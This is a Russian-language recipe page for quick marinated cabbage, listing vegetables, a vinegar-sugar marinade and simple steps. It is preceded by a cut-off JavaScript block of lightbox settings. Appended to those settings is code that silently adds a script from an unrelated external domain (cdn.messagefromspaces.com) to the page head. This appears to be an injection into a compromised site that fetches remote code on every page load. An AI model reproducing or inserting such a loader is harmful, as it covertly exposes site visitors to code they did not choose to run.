, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Вкусно + Полезно

Капуста маринованная


Это наивкуснейшее и наипростейшее в приготовлении блюдо. В каком бы количестве я ее не предлагала гостям, не остается ничего и еще с собой просят!

 

Что и сколько берем:

1. Капуста белокачанная — 2 кг

2. Морковь — 2 шт.

3. Перец болгарский — 1 шт.

4. Перец острый стручковый — полстручка

5. Чеснок — 4 зубка

Маринад:

1. Cоль — 1.5 ст.ложки

2. Сахар — полстакана

3. Масло растительное — 1 ст. ложка

4. Уксус 6% — 3 ст. ложки

5. Вода — 1 литр

 

Начинаем готовить:

Шинкуем тоненько капусту (причем, мять ее, как для квашения, вовсе не нужно), трем морковь на терке, тонко режем перцы и все просто смешиваем. Далее,  осталось приготовить маринад и залить им нашу капусту. В кипящую воду кладем все ингредиенты, ну, и заливаем капусту. Вот и все! Есть эту проекрасную закусочку можно на следующий день. Кто не любит острое, тот не кладет острый перец. Хотя, я бы рекомендовала, хоть малюсенький кусочек, но положить.

На эту тему вы можете почитать:

Цветная капуста в маринаде

Тэги: , , ,



Добавить комментарий